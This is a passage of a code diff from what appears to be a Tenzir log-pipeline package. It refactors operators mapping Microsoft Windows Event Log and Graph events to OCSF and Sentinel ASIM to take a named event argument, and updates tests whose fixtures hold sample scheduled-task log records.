microsoft::asim::ocsf::entity_management event=$event } 201004 => { - microsoft::asim::ocsf::windows_service_activity + microsoft::asim::ocsf::windows_service_activity event=$event } 3002 => { - microsoft::asim::ocsf::authentication + microsoft::asim::ocsf::authentication event=$event } 3003 => { - microsoft::asim::ocsf::authorize_session + microsoft::asim::ocsf::authorize_session event=$event } 3001 => { - microsoft::asim::ocsf::account_change + microsoft::asim::ocsf::account_change event=$event } 3006 => { - microsoft::asim::ocsf::group_management + microsoft::asim::ocsf::group_management event=$event } 1007 => { - microsoft::asim::ocsf::process_activity + microsoft::asim::ocsf::process_activity event=$event } 1001 => { - microsoft::asim::ocsf::file_system_activity + microsoft::asim::ocsf::file_system_activity event=$event } 4001 => { - microsoft::asim::ocsf::network_activity + microsoft::asim::ocsf::network_activity event=$event } 4002 => { - microsoft::asim::ocsf::http_activity + microsoft::asim::ocsf::http_activity event=$event } 4003 => { - microsoft::asim::ocsf::dns_activity + microsoft::asim::ocsf::dns_activity event=$event } 4004 => { - microsoft::asim::ocsf::dhcp_activity + microsoft::asim::ocsf::dhcp_activity event=$event } _ => { assert false, message={ reason: "unsupported OCSF to ASIM mapping", - class_uid: class_uid?, - class_name: class_name?, - type_uid: type_uid?, - type_name: type_name?, + class_uid: $event.class_uid?, + class_name: $event.class_name?, + type_uid: $event.type_uid?, + type_name: $event.type_name?, name: @name, } } diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql index ce8042a..70b9a6b 100644 --- a/microsoft/operators/asim/ocsf/network_activity.tql +++ b/microsoft/operators/asim/ocsf/network_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Network Activity events to Microsoft Sentinel ASIM NetworkSession records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 4001 +assert $event.class_uid == 4001 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -32,4 +39,5 @@ match ocsf.disposition? { _ => {} } -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql index ee0c83a..0d94a2c 100644 --- a/microsoft/operators/asim/ocsf/process_activity.tql +++ b/microsoft/operators/asim/ocsf/process_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Process Activity events to Microsoft Sentinel ASIM ProcessEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 1007 +assert $event.class_uid == 1007 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -28,4 +35,5 @@ asim.TargetProcessName = ocsf.process?.name? else ocsf.process?.file?.name? else asim.TargetProcessCommandLine = ocsf.process?.cmd_line? asim.TargetUserId = ocsf.user?.uid? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql index 306a042..1444363 100644 --- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql +++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM AuditEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 1006 +assert $event.class_uid == 1006 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -38,4 +45,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql index 2d52a32..ae5e1b5 100644 --- a/microsoft/operators/asim/ocsf/windows_service_activity.tql +++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql @@ -1,8 +1,15 @@ --- description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASIM AuditEvent records. +args: + named: + - name: event + description: The field that holds the OCSF event to map. + type: field --- -assert class_uid == 201004 +assert $event.class_uid == 201004 + +ocsf = $event microsoft::asim::ocsf::helpers::common @@ -38,4 +45,5 @@ asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? -this = {...asim, AdditionalFields: ocsf} +$event = {...asim, AdditionalFields: ocsf} +drop ocsf, asim diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index b8506f5..1489dc1 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -1,8 +1,14 @@ --- description: Microsoft Graph → OCSF +args: + named: + - name: event + description: The field that holds the Microsoft Graph event to map. + type: field --- -this = {graph: this, ocsf: {}} +graph = $event +ocsf = {} ocsf.cloud = { provider: "Azure", @@ -63,4 +69,5 @@ match @name { } } -this = {...ocsf, unmapped: graph} +$event = {...ocsf, unmapped: graph} +drop graph, ocsf diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql index 5208749..bf71cc6 100644 --- a/microsoft/operators/ocsf/map.tql +++ b/microsoft/operators/ocsf/map.tql @@ -1,9 +1,14 @@ --- description: Maps supported Microsoft events to OCSF. +args: + named: + - name: event + description: The field that holds the Microsoft event to map. + type: field --- -if @name == "microsoft.windows.eventlog" or System? != null { - microsoft::windows::ocsf::map +if $event.System? != null { + microsoft::windows::ocsf::map event=$event } else { - microsoft::graph::ocsf::map + microsoft::graph::ocsf::map event=$event } diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index ef62c4b..0014aeb 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -1,8 +1,14 @@ --- description: Structured Microsoft Windows Event Log → OCSF +args: + named: + - name: event + description: The field that holds the structured Windows event to map. + type: field --- -this = {windows: this, ocsf: {}} +windows = $event +ocsf = {} ocsf.metadata = { event_code: windows.System.EventID.string(), @@ -139,4 +145,5 @@ match windows.System.EventID { } drop windows.System.EventID -this = {...ocsf, unmapped: windows} +$event = {...ocsf, unmapped: windows} +drop windows, ocsf diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql index 68698dc..1786139 100644 --- a/microsoft/tests/asim/graph.tql +++ b/microsoft/tests/asim/graph.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -microsoft::asim::map +event = this +microsoft::asim::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql index 11e19d8..1dd292b 100644 --- a/microsoft/tests/asim/ocsf.tql +++ b/microsoft/tests/asim/ocsf.tql @@ -30,5 +30,7 @@ from { ip: 10.0.0.1, }, } -microsoft::asim::map +event = this +microsoft::asim::map event=event +this = event name = @name diff --git a/microsoft/tests/asim/ocsf/account_change.tql b/microsoft/tests/asim/ocsf/account_change.tql index 64b9b0a..93c9845 100644 --- a/microsoft/tests/asim/ocsf/account_change.tql +++ b/microsoft/tests/asim/ocsf/account_change.tql @@ -77,6 +77,8 @@ from { } @name = "ocsf.account_change" where class_uid == 3001 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/authentication.tql b/microsoft/tests/asim/ocsf/authentication.tql index 056ddfc..092e691 100644 --- a/microsoft/tests/asim/ocsf/authentication.tql +++ b/microsoft/tests/asim/ocsf/authentication.tql @@ -143,6 +143,8 @@ from { }, } @name = "ocsf.authentication" -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/detection_finding.tql b/microsoft/tests/asim/ocsf/detection_finding.tql index a63ba80..ea4bd97 100644 --- a/microsoft/tests/asim/ocsf/detection_finding.tql +++ b/microsoft/tests/asim/ocsf/detection_finding.tql @@ -51,5 +51,7 @@ from { ], } @name = "ocsf.detection_finding" -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql index c1e5d1f..ab5dce3 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 4004 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql index 2f140d1..aaebb7e 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.tql +++ b/microsoft/tests/asim/ocsf/dns_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 4003 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/event_log_activity.tql b/microsoft/tests/asim/ocsf/event_log_activity.tql index af795f7..e96d16e 100644 --- a/microsoft/tests/asim/ocsf/event_log_activity.tql +++ b/microsoft/tests/asim/ocsf/event_log_activity.tql @@ -39,5 +39,7 @@ from { }, } @name = "ocsf.event_log_activity" -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql index 71badea..2fdaa6b 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.tql +++ b/microsoft/tests/asim/ocsf/file_system_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 1001 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql index e80f66c..2290440 100644 --- a/microsoft/tests/asim/ocsf/group_management.tql +++ b/microsoft/tests/asim/ocsf/group_management.tql @@ -77,6 +77,8 @@ from { } @name = "ocsf.group_management" where class_uid == 3006 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql index 03d4dce..0aad2b6 100644 --- a/microsoft/tests/asim/ocsf/http_activity.tql +++ b/microsoft/tests/asim/ocsf/http_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 4002 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/map.tql b/microsoft/tests/asim/ocsf/map.tql index 391f957..951d4c7 100644 --- a/microsoft/tests/asim/ocsf/map.tql +++ b/microsoft/tests/asim/ocsf/map.tql @@ -26,5 +26,6 @@ from { } @name = "ocsf.script_activity" strict { - microsoft::asim::ocsf::map + event = this + microsoft::asim::ocsf::map event=event } diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql index fcd58a4..7464df1 100644 --- a/microsoft/tests/asim/ocsf/network_activity.tql +++ b/microsoft/tests/asim/ocsf/network_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 4001 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/process_activity.tql b/microsoft/tests/asim/ocsf/process_activity.tql index 0758530..f274b93 100644 --- a/microsoft/tests/asim/ocsf/process_activity.tql +++ b/microsoft/tests/asim/ocsf/process_activity.tql @@ -55,5 +55,7 @@ from { }, } @name = "ocsf.process_activity" -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index 9c85c19..cd97789 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } this = data.parse_winlog() -microsoft::asim::map +event = this +microsoft::asim::map event=event +this = event name = @name drop AdditionalFields.metadata.processed_time? diff --git a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql index eda2e63..0458603 100644 --- a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql +++ b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql @@ -2,7 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/compliance-policy-setting-state-summari read_json } @name = "microsoft.graph.intune.compliance_policy_setting_state_summary" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-alerts.tql b/microsoft/tests/graph/ocsf/defender-alerts.tql index b597953..1c11eb4 100644 --- a/microsoft/tests/graph/ocsf/defender-alerts.tql +++ b/microsoft/tests/graph/ocsf/defender-alerts.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-alerts.ndjson" { read_json } @name = "microsoft.graph.defender.alert" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-incidents.tql b/microsoft/tests/graph/ocsf/defender-incidents.tql index d6ff2e3..47eeb98 100644 --- a/microsoft/tests/graph/ocsf/defender-incidents.tql +++ b/microsoft/tests/graph/ocsf/defender-incidents.tql @@ -2,7 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-incidents.ndjson" { read_json } @name = "microsoft.graph.defender.incident" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast sort time, metadata.original_event_uid diff --git a/microsoft/tests/graph/ocsf/detected-apps.tql b/microsoft/tests/graph/ocsf/detected-apps.tql index ef02388..30f8d42 100644 --- a/microsoft/tests/graph/ocsf/detected-apps.tql +++ b/microsoft/tests/graph/ocsf/detected-apps.tql @@ -2,7 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/detected-apps.ndjson" { read_json } @name = "microsoft.graph.intune.detected_app" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/directory-audits.tql b/microsoft/tests/graph/ocsf/directory-audits.tql index 973eafc..729d082 100644 --- a/microsoft/tests/graph/ocsf/directory-audits.tql +++ b/microsoft/tests/graph/ocsf/directory-audits.tql @@ -2,7 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/directory-audits.ndjson" { read_json } @name = "microsoft.graph.directory_audit" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast sort time diff --git a/microsoft/tests/graph/ocsf/managed-devices.tql b/microsoft/tests/graph/ocsf/managed-devices.tql index 1524afe..db70247 100644 --- a/microsoft/tests/graph/ocsf/managed-devices.tql +++ b/microsoft/tests/graph/ocsf/managed-devices.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/managed-devices.ndjson" { read_json } @name = "microsoft.graph.intune.managed_device" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risk-detections.tql b/microsoft/tests/graph/ocsf/risk-detections.tql index 5fc5d4e..70bfa49 100644 --- a/microsoft/tests/graph/ocsf/risk-detections.tql +++ b/microsoft/tests/graph/ocsf/risk-detections.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risk-detections.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risk_detection" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risky-users.tql b/microsoft/tests/graph/ocsf/risky-users.tql index 8d9ac02..f032774 100644 --- a/microsoft/tests/graph/ocsf/risky-users.tql +++ b/microsoft/tests/graph/ocsf/risky-users.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risky-users.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risky_user" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/sign-ins.tql b/microsoft/tests/graph/ocsf/sign-ins.tql index 2c86d79..c826a17 100644 --- a/microsoft/tests/graph/ocsf/sign-ins.tql +++ b/microsoft/tests/graph/ocsf/sign-ins.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0100.tql b/microsoft/tests/ocsf/eid-0100.tql index ba407bd..839bd50 100644 --- a/microsoft/tests/ocsf/eid-0100.tql +++ b/microsoft/tests/ocsf/eid-0100.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0100.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0100.txt b/microsoft/tests/ocsf/eid-0100.txt index dd0e623..cdd4ffe 100644 --- a/microsoft/tests/ocsf/eid-0100.txt +++ b/microsoft/tests/ocsf/eid-0100.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 100\n 0\n 4\n 0\n 0x8000000000000000\n \n 30100\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n NT AUTHORITY\\SYSTEM\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n \n\n", + raw_data_size: 871, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0101.tql b/microsoft/tests/ocsf/eid-0101.tql index a8a0536..2065428 100644 --- a/microsoft/tests/ocsf/eid-0101.tql +++ b/microsoft/tests/ocsf/eid-0101.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0101.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0101.txt b/microsoft/tests/ocsf/eid-0101.txt index 2deee87..2969cf5 100644 --- a/microsoft/tests/ocsf/eid-0101.txt +++ b/microsoft/tests/ocsf/eid-0101.txt @@ -34,6 +34,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 101\n 0\n 2\n 0\n 0x8000000000000000\n \n 30101\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {1A2B3C4D-5E6F-7A8B-9C0D-1E2F3A4B5C6D}\n -2147024894\n \n\n", + raw_data_size: 862, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-0102.tql b/microsoft/tests/ocsf/eid-0102.tql index d970c62..1a792a4 100644 --- a/microsoft/tests/ocsf/eid-0102.tql +++ b/microsoft/tests/ocsf/eid-0102.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0102.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0102.txt b/microsoft/tests/ocsf/eid-0102.txt index d3d0576..86b457d 100644 --- a/microsoft/tests/ocsf/eid-0102.txt +++ b/microsoft/tests/ocsf/eid-0102.txt @@ -34,6 +34,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 102\n 0\n 4\n 0\n 0x8000000000000000\n \n 30102\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n 0\n \n\n", + raw_data_size: 852, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-0106.tql b/microsoft/tests/ocsf/eid-0106.tql index 88bba1f..7bcbab0 100644 --- a/microsoft/tests/ocsf/eid-0106.tql +++ b/microsoft/tests/ocsf/eid-0106.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0106.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0106.txt b/microsoft/tests/ocsf/eid-0106.txt index fd47aad..aa76ea2 100644 --- a/microsoft/tests/ocsf/eid-0106.txt +++ b/microsoft/tests/ocsf/eid-0106.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 106\n 0\n 4\n 0\n 0x8000000000000000\n \n 30106\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", + raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0129.tql b/microsoft/tests/ocsf/eid-0129.tql index aef6b70..b4f59f8 100644 --- a/microsoft/tests/ocsf/eid-0129.tql +++ b/microsoft/tests/ocsf/eid-0129.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0129.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0129.txt b/microsoft/tests/ocsf/eid-0129.txt index ed2b6bf..485399c 100644 --- a/microsoft/tests/ocsf/eid-0129.txt +++ b/microsoft/tests/ocsf/eid-0129.txt @@ -39,6 +39,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 129\n 0\n 4\n 0\n 0x8000000000000000\n \n 30129\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n 6812\n \n\n", + raw_data_size: 854, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0140.tql b/microsoft/tests/ocsf/eid-0140.tql index d3b1e42..4293d2a 100644 --- a/microsoft/tests/ocsf/eid-0140.tql +++ b/microsoft/tests/ocsf/eid-0140.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0140.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0140.txt b/microsoft/tests/ocsf/eid-0140.txt index 85c9ca3..1dca283 100644 --- a/microsoft/tests/ocsf/eid-0140.txt +++ b/microsoft/tests/ocsf/eid-0140.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 140\n 0\n 4\n 0\n 0x8000000000000000\n \n 30140\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", + raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0141.tql b/microsoft/tests/ocsf/eid-0141.tql index 74937b5..066eaad 100644 --- a/microsoft/tests/ocsf/eid-0141.tql +++ b/microsoft/tests/ocsf/eid-0141.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0141.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0141.txt b/microsoft/tests/ocsf/eid-0141.txt index f84c9fb..ea7c9e9 100644 --- a/microsoft/tests/ocsf/eid-0141.txt +++ b/microsoft/tests/ocsf/eid-0141.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 141\n 0\n 4\n 0\n 0x8000000000000000\n \n 30141\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", + raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:35:01Z, diff --git a/microsoft/tests/ocsf/eid-0200.tql b/microsoft/tests/ocsf/eid-0200.tql index d4fe04f..a79c239 100644 --- a/microsoft/tests/ocsf/eid-0200.tql +++ b/microsoft/tests/ocsf/eid-0200.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0200.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0200.txt b/microsoft/tests/ocsf/eid-0200.txt index cd37b92..7410aea 100644 --- a/microsoft/tests/ocsf/eid-0200.txt +++ b/microsoft/tests/ocsf/eid-0200.txt @@ -45,6 +45,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 200\n 0\n 4\n 0\n 0x8000000000000000\n \n 30200\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n C:\\tmp\\payload.exe\n 1032\n \n\n", + raw_data_size: 912, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0201.tql b/microsoft/tests/ocsf/eid-0201.tql index 4433671..d151ad7 100644 --- a/microsoft/tests/ocsf/eid-0201.tql +++ b/microsoft/tests/ocsf/eid-0201.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0201.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0201.txt b/microsoft/tests/ocsf/eid-0201.txt index 49c8184..3d16e3a 100644 --- a/microsoft/tests/ocsf/eid-0201.txt +++ b/microsoft/tests/ocsf/eid-0201.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 201\n 0\n 4\n 0\n 0x8000000000000000\n \n 30201\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n C:\\tmp\\payload.exe\n 0\n \n\n", + raw_data_size: 910, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-1000.tql b/microsoft/tests/ocsf/eid-1000.tql index 60543e4..37e625b 100644 --- a/microsoft/tests/ocsf/eid-1000.tql +++ b/microsoft/tests/ocsf/eid-1000.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1000.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1000.txt b/microsoft/tests/ocsf/eid-1000.txt index e83a5ed..c4f9336 100644 --- a/microsoft/tests/ocsf/eid-1000.txt +++ b/microsoft/tests/ocsf/eid-1000.txt @@ -43,6 +43,8 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, + raw_data: "\n \n \n 1000\n 0\n 2\n 100\n 0x80000000000000\n \n 8001\n \n \n Application\n WINHOST01.corp.local\n \n \n payload.exe\n 0.0.0.0\n 67df1234\n payload.exe\n 